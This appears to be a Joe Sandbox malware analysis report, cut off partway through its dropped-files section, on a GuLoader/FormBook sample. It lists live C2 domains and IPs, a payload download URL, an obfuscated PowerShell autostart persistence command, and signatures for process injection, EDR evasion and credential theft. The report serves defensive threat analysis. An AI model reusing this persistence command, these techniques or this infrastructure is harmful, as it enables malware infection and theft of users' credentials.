        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
        Virtualization/Sandbox Evasion        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt512
        Process Injection        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1426828 Sample: 160420241245287.exe Startdate: 16/04/2024 Architecture: WINDOWS Score: 100 53 www.eternalsunrise.xyz 2->53 55 www.n-benriya002.com 2->55 57 5 other IPs or domains 2->57 83 Multi AV Scanner detection for domain / URL 2->83 85 Malicious sample detected (through community Yara rule) 2->85 87 Antivirus detection for URL or domain 2->87 91 4 other signatures 2->91 11 160420241245287.exe 2 79 2->11         started        signatures3 89 Performs DNS queries to domains with low reputation 53->89 process4 file5 45 C:\Users\user\AppData\Roaming\...\tailors.ver, DOS 11->45 dropped 47 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 11->47 dropped 49 C:\Users\user\AppData\...\Randrusianeren.Unf, ASCII 11->49 dropped 105 Suspicious powershell command line found 11->105 15 powershell.exe 20 11->15         started        signatures6 process7 file8 51 C:\Users\user\AppData\...\Untapestried.exe, PE32 15->51 dropped 67 Obfuscated command line found 15->67 69 Writes to foreign memory regions 15->69 71 Sample uses process hollowing technique 15->71 73 3 other signatures 15->73 19 Untapestried.exe 2 7 15->19         started        23 conhost.exe 15->23         started        25 cmd.exe 1 15->25         started        signatures9 process10 dnsIp11 59 103.14.155.180, 49736, 80 EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHK unknown 19->59 93 Multi AV Scanner detection for dropped file 19->93 95 Machine Learning detection for dropped file 19->95 97 Maps a DLL or memory area into another process 19->97 99 Hides threads from debuggers 19->99 27 bvvgQqxLmFZr.exe 19->27 injected 30 cmd.exe 1 19->30         started        signatures12 process13 signatures14 103 Found direct / indirect Syscall (likely to bypass EDR) 27->103 32 cmd.exe 13 27->32         started        35 conhost.exe 30->35         started        37 reg.exe 1 1 30->37         started        process15 signatures16 75 Tries to steal Mail credentials (via file / registry access) 32->75 77 Tries to harvest and steal browser information (history, passwords, etc) 32->77 79 Modifies the context of a thread in another process (thread injection) 32->79 81 2 other signatures 32->81 39 bvvgQqxLmFZr.exe 32->39 injected 43 firefox.exe 32->43         started        process17 dnsIp18 61 www.eternalsunrise.xyz 66.29.135.159, 49751, 49752, 80 ADVANTAGECOMUS United States 39->61 63 n-benriya002.com 219.94.128.41, 49743, 49744, 49745 SAKURA-CSAKURAInternetIncJP Japan 39->63 65 3 other IPs or domains 39->65 101 Found direct / indirect Syscall (likely to bypass EDR) 39->101 signatures19

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        160420241245287.exe11%ReversingLabsWin32.Trojan.GuLoader
        160420241245287.exe18%VirustotalBrowse
        160420241245287.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\Untapestried.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\Untapestried.exe11%ReversingLabsWin32.Trojan.GuLoader
        C:\Users\user\AppData\Local\Temp\Untapestried.exe18%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll1%VirustotalBrowse
        C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs\tailors.ver0%VirustotalBrowse

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        ejbodyart.com0%VirustotalBrowse
        n-benriya002.com0%VirustotalBrowse
        www.jt-berger.store2%VirustotalBrowse
        www.ejbodyart.com0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        http://www.jt-berger.store/9pdo/2%VirustotalBrowse
        http://www.n-benriya002.com/9pdo/2%VirustotalBrowse
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%VirustotalBrowse
        http://www.scwspark.com/9pdo/1%VirustotalBrowse
        http://103.14.155.180/CkkRLCTUxW193.bin8%VirustotalBrowse
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%VirustotalBrowse
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%VirustotalBrowse
        http://103.14.155.180/3%VirustotalBrowse
        http://www.eternalsunrise.xyz/9pdo/1%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        ejbodyart.com
        		112.175.50.218
        		truefalseunknown
        n-benriya002.com
        		219.94.128.41
        		truefalseunknown
        www.scwspark.com
        		81.88.63.46
        		truefalse
          		unknown
          www.jt-berger.store
          		217.160.0.183
          		truefalseunknown
          www.eternalsunrise.xyz
          		66.29.135.159
          		truetrue
            		unknown
            www.ejbodyart.com
            		unknown
            		unknowntrueunknown
            www.n-benriya002.com
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.ejbodyart.com/9pdo/?jzuh=7Bfls2&edR0hF=DnYaRovP48GzkkJrYMXu2fP+AE8bpUHwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMVyf8d4q8oRy488on7FLg2VDUaCWqziINF2DU=false
                		unknown
                http://www.jt-berger.store/9pdo/falseunknown
                http://www.n-benriya002.com/9pdo/falseunknown
                http://www.jt-berger.store/9pdo/?edR0hF=9/X38tn9qLO2xSF02XNB/rY3zD6RCSMCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFniev+GXC9dB/42VqWS3YgLMlW8u3PKxI03yuVQ=&jzuh=7Bfls2false
                  		unknown
                  http://www.n-benriya002.com/9pdo/?edR0hF=REEnkW6M+TEq7R0RTFAEOK6A593ZXFJD8cCdAclTZkEAO29Celit1EJdRt8L6G9Xd5xqtutsMklg2OrtOvYkqvTyuEt4cazTHdJ4IhgWhtZseUa+ZlJk5aI=&jzuh=7Bfls2false
                    		unknown
                    http://103.14.155.180/CkkRLCTUxW193.binfalseunknown
                    http://www.scwspark.com/9pdo/falseunknown
                    http://www.scwspark.com/9pdo/?edR0hF=exLCvVI2E5RJM8xtzs4Hapiqzu/uGv/f+6d2cWgRCMmdoFVcUWazUq40e3zK6s54E+NAVH76kqhd1uh4f2sEtFmHSsWrMW9P35+QXkOmQzbQkkc9XIR6mDA=&jzuh=7Bfls2false
                      		unknown
                      http://www.eternalsunrise.xyz/9pdo/falseunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabcmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://n-benriya002.com/9pdo/?edR0hF=REEnkW6Mcmd.exe, 0000000C.00000002.2889167441.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000002.2888724701.00000000036B8000.00000004.00000001.00040000.00000000.sdmpfalse
                            		unknown
                            https://duckduckgo.com/ac/?q=cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2057282708.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2056681906.000000000308A000.00000004.00000020.00020000.00000000.sdmptrue
                              • URL Reputation: malware
                              		unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2057282708.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2056681906.000000000308A000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://www.eternalsunrise.xyzbvvgQqxLmFZr.exe, 0000000D.00000002.2887373536.000000000115C000.00000040.80000000.00040000.00000000.sdmpfalse
                                  		unknown
                                  https://contoso.com/Licensepowershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/Iconpowershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.ftp.ftp://ftp.gopher.Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmpfalse
                                      		unknown
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://nsis.sf.net/NSIS_ErrorError160420241245287.exe, Untapestried.exe.1.drfalse
                                          		high
                                          https://www.ecosia.org/newtab/cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://aka.ms/pscore6lBqqpowershell.exe, 00000001.00000002.2057282708.0000000005071000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2057282708.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2056681906.000000000308A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://103.14.155.180/CkkRLCTUxW193.binOUntapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://103.14.155.180/CkkRLCTUxW193.bin3cUntapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://ac.ecosia.org/autocomplete?q=cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdUntapestried.exe, 00000007.00000001.1996319048.00000000005F2000.00000008.00000001.01000000.00000009.sdmpfalseunknown
                                                      http://103.14.155.180/iUntapestried.exe, 00000007.00000002.2158641488.000000000475D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://103.14.155.180/It3Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://contoso.com/powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmpfalseunknown
                                                              http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdUntapestried.exe, 00000007.00000001.1996319048.00000000005F2000.00000008.00000001.01000000.00000009.sdmpfalseunknown
                                                              http://103.14.155.180/Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                              http://103.14.155.180/NTIFIER=Intel64Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2057282708.0000000005071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://103.14.155.180/CkkRLCTUxW193.bin.Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      103.14.155.180
                                                                      		unknownunknown
                                                                      		58451EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHKfalse
                                                                      219.94.128.41
                                                                      		n-benriya002.comJapan9371SAKURA-CSAKURAInternetIncJPfalse
                                                                      66.29.135.159
                                                                      		www.eternalsunrise.xyzUnited States
                                                                      		19538ADVANTAGECOMUStrue
                                                                      81.88.63.46
                                                                      		www.scwspark.comItaly
                                                                      		39729REGISTER-ASITfalse
                                                                      217.160.0.183
                                                                      		www.jt-berger.storeGermany
                                                                      		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                      112.175.50.218
                                                                      		ejbodyart.comKorea Republic of
                                                                      		4766KIXS-AS-KRKoreaTelecomKRfalse

                                                                      General Information

                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                      Analysis ID:1426828
                                                                      Start date and time:2024-04-16 17:15:07 +02:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 9m 50s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:14
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:2
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:160420241245287.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@17/54@5/6
                                                                      EGA Information:
                                                                      • Successful, ratio: 40%
                                                                      HCA Information:
                                                                      • Successful, ratio: 84%
                                                                      • Number of executed functions: 132
                                                                      • Number of non-executed functions: 252
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target powershell.exe, PID 7304 because it is empty
                                                                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      16:16:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Lgplante %Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)
                                                                      16:16:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Lgplante %Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)
                                                                      17:15:54API Interceptor43x Sleep call for process: powershell.exe modified
                                                                      17:17:23API Interceptor631858x Sleep call for process: cmd.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      103.14.155.18016042024124521.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 103.14.155.180/bwphkvcX154.bin
                                                                      2024164846750.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 103.14.155.180/yYStJN62.bin
                                                                      S#U0130PAR#U0130S_0453.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 103.14.155.180/AJiUJeCwtysrVswj26.bin
                                                                      2024041342836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 103.14.155.180/bEtaNzB191.bin
                                                                      202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 103.14.155.180/KFhYG187.bin
                                                                      zamowienie_002523.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 103.14.155.180/YTtXUgP216.bin
                                                                      219.94.128.412024164846750.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.n-benriya002.com/9pdo/
                                                                      S#U0130PAR#U0130S_0453.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.n-benriya002.com/9pdo/
                                                                      2024041342836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.n-benriya002.com/9pdo/
                                                                      202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.n-benriya002.com/9pdo/
                                                                      zamowienie_002523.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.n-benriya002.com/9pdo/
                                                                      66.29.135.1592024164846750.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.eternalsunrise.xyz/9pdo/
                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                      • www.quantumboulevard.xyz/qruc/
                                                                      202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.eternalsunrise.xyz/9pdo/
                                                                      zamowienie_002523.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.eternalsunrise.xyz/9pdo/
                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                      • www.quantumboulevard.xyz/qruc/

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      www.scwspark.com2024164846750.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 81.88.63.46
                                                                      202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 81.88.63.46
                                                                      zamowienie_002523.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 81.88.63.46
                                                                      www.eternalsunrise.xyz2024164846750.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 66.29.135.159
                                                                      202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 66.29.135.159
                                                                      zamowienie_002523.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 66.29.135.159
                                                                      www.jt-berger.store16042024124521.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 217.160.0.183
                                                                      2024164846750.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 217.160.0.183
                                                                      S#U0130PAR#U0130S_0453.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 217.160.0.183
                                                                      2024041342836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 217.160.0.183
                                                                      202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 217.160.0.183
                                                                      zamowienie_002523.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 217.160.0.183

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      ADVANTAGECOMUS2024164846750.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 66.29.135.159
                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                      • 66.29.135.159
                                                                      202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 66.29.135.159
                                                                      zamowienie_002523.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 66.29.135.159
                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                      • 66.29.135.159
                                                                      copy_106_10210_31.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                                                      • 66.29.151.236
                                                                      17129052285907bbffa1e06db9a2c2be9b124dbfe370dcce33488c29504b5286529b8a6aa8471.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 66.29.159.53
                                                                      xnYuUw7KjK.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 66.29.151.236
                                                                      0ekwLomWKo.exeGet hashmaliciousFormBookBrowse
                                                                      • 66.29.149.46
                                                                      https://legranrd.com/GeVAcsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 66.29.148.78
                                                                      EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHK16042024124521.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 103.14.155.180
                                                                      2024164846750.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 103.14.155.180
                                                                      S#U0130PAR#U0130S_0453.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 103.14.155.180
                                                                      2024041342836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 103.14.155.180
                                                                      202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 103.14.155.180
                                                                      zamowienie_002523.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 103.14.155.180
                                                                      f9hHTjsZdf.exeGet hashmaliciousUnknownBrowse
                                                                      • 103.243.100.13
                                                                      f9hHTjsZdf.exeGet hashmaliciousUnknownBrowse
                                                                      • 103.243.100.13
                                                                      54Z6ldWRL5.exeGet hashmaliciousUnknownBrowse
                                                                      • 103.243.100.13
                                                                      54Z6ldWRL5.exeGet hashmaliciousUnknownBrowse
                                                                      • 103.243.100.13
                                                                      SAKURA-CSAKURAInternetIncJPhttps://ruv80zbas1.execute-api.us-east-1.amazonaws.com/prod/jump?redirect_url=http://bs-nakagawa.com/PMxdv77xgwVSyGqqOWzi/62df5bbd4291fb27f637dee413562c6e/bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20=&creative_id=601&tag_name=Rob_A_Facebook&operative_id=33090Get hashmaliciousHTMLPhisherBrowse
                                                                      • 183.90.246.80
                                                                      2024164846750.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 219.94.128.41
                                                                      S#U0130PAR#U0130S_0453.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 219.94.128.41
                                                                      2024041342836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 219.94.128.41
                                                                      202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 219.94.128.41
                                                                      994LJMbRxE.elfGet hashmaliciousMiraiBrowse
                                                                      • 157.112.148.13
                                                                      zamowienie_002523.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 219.94.128.41
                                                                      http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=clickme.thryv.com/ls/click?upn=u001.zNsZ6DgZGUlz4SyL2q0KgfvLUZd1vxrIdCMo5dY5qCEyeaGmNINChKOlELp3fRT1rsLBxEJdRXYvy6S-2BGEY7uicd3tbSMV5oJVhczVlIJxNtA-2BurH4j6WXNUMDWH8Xtyor4mjkn1VIVtPJTCW3IlMRG3a4MIeGKbPJD2WFpltpzviF50nMF1DDbgC9X6S9w9Hlc1oLQOQrL-2F5NOag02nHzFb0iLScFwtYhl7ivMYLz0-3DlYp0_JVAtn8RK-2FYGAFwojudbatEe6kKijRrOmSDoK71rQZxdvCfQSeCo-2BRBdkQ5VWb782IaijolxlNh8UaJUpVC3oTrBWLQ0nDIwqRnMGXEH-2FVvabEpl0ypWmwFSXmHQXgR2OtjYxsjQq8JqnCS0xJ6x5Hw2KTEpFQlfF7UILlGxlM8XnIewK-2FaJufFXkpj77DIQAUJIbbgxdsd6A82g6UCqhJrLxeAFCIG7p5DQ3gDp3jrTu2g01Y1dJ78akz0sR2ouRL8yC2fH0p3U5mmt7xctz27iCjzyIwMztlvkJaOc0tsUXBISBrbO3CkhbRwyYHpkDtiv91MtbaUTYJ4SSBMc4tw4DQdyflUkkcsGLNoBKOnZYoBecXCGDUCOXb8bLi9mYrh-2F2YZwAXwNbq-2BqqypetrxX-2BFRmar-2F5nHTrF20p1pew-3D#a3Jvc3NAbW9udGFnZWdvbGRjb3JwLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                      • 120.136.14.8
                                                                      240330_unpackedGet hashmaliciousUnknownBrowse
                                                                      • 219.94.162.171
                                                                      u82QW5hCzv.elfGet hashmaliciousMiraiBrowse
                                                                      • 112.78.226.183
                                                                      REGISTER-ASIT2024164846750.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 81.88.63.46
                                                                      202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 81.88.63.46
                                                                      Ordin de plat#U0103.exeGet hashmaliciousFormBookBrowse
                                                                      • 81.88.63.46
                                                                      zamowienie_002523.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 81.88.63.46
                                                                      mrPTE618YB.exeGet hashmaliciousPureLog StealerBrowse
                                                                      • 195.110.124.188
                                                                      yx0H3RO9ur.exeGet hashmaliciousFormBookBrowse
                                                                      • 195.110.124.133
                                                                      Trsten.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 81.88.57.68
                                                                      Grundforbedre39.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 195.110.124.133
                                                                      venerationens.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 195.110.124.133
                                                                      CATALOG LISTs#U180ex#U180el#U180ex#U180e..exeGet hashmaliciousFormBookBrowse
                                                                      • 81.88.48.71

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):8003
                                                                      Entropy (8bit):4.838950934453595
                                                                      Encrypted:false
                                                                      SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                                      MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                                      SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                                      SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                                      SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                      C:\Users\user\AppData\Local\Temp\545Ni1I

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                      Category:dropped
                                                                      Size (bytes):114688
